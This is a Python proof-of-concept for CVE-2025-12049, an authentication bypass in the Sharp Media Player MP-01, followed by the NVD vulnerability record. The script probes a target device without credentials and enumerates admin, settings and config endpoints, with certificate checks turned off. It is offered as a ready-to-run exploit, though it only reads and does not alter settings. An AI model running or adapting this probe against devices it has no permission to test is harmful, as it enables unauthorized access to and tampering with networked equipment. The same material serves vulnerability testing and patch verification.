CVE-2025-12049

# CVE-2025-12049 PoC - Sharp Media Player MP-01 Authentication Bypass # No authentication required to access web interface import requests import sys def check_vulnerability(target_url): """ Check if the target Sharp Media Player MP-01 is vulnerable to CVE-2025-12049 (Missing Authentication for Critical Function) """ try: # Try to access the web interface without authentication # The vulnerable endpoint is the root web interface headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' } # Attempt to access the main web interface response = requests.get(target_url, headers=headers, timeout=10, verify=False) print(f"[*] Target: {target_url}") print(f"[*] Status Code: {response.status_code}") if response.status_code == 200: print("[!] VULNERABLE: Web interface accessible without authentication!") print(f"[*] Response length: {len(response.text)} bytes") # Check for common web interface indicators if 'Sharp' in response.text or 'Media Player' in response.text: print("[!] CONFIRMED: Sharp Media Player interface detected") return True else: print("[*] Target may not be vulnerable or is not reachable") return False except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") return False def exploit_settings_access(target_url): """ Attempt to access settings/configuration without authentication """ common_paths = [ '/', '/settings', '/config', '/admin', '/api/settings', '/api/config', '/api/status' ] for path in common_paths: try: url = target_url.rstrip('/') + path response = requests.get(url, timeout=10, verify=False) print(f"[*] Path: {path} - Status: {response.status_code}") if response.status_code == 200: print(f"[!] Accessible: {url}") except: pass if __name__ == "__main__": if len(sys.argv) > 1: target = sys.argv[1] else: target = "http://target-device/" # Modify target IP/hostname print("=" * 60) print("CVE-2025-12049 PoC - Sharp Media Player MP-01") print("Missing Authentication for Critical Function") print("=" * 60) check_vulnerability(target) exploit_settings_access(target)

{"cve": {"id": "CVE-2025-12049", "sourceIdentifier": "[email protected]", "published": "2025-12-22T05:16:19.120", "lastModified": "2026-01-15T20:01:12.760", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "Missing Authentication for Critical Function vulnerability in Sharp Display Solutions Media Player MP-01 All Verisons allows a attacker may access to the web interface of the affected product without authentication and change settings or perform other operations, and deliver content from the authoring software to the affected product without authentication."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.2, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sharp:mp-01_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "E22249A4-D150-44EE-97F0-0A4F5E68F808"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sharp:mp-01:-:*:*:*:*:*:*:*", "matchCriteriaId": "2472FECF-DBA8-4DAD-A766-B5B31CAD9319"}]}]}], "references": [{"url": "https://sharp-displays.jp.sharp/global/support/info/MP01-CVE-2025-12049.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}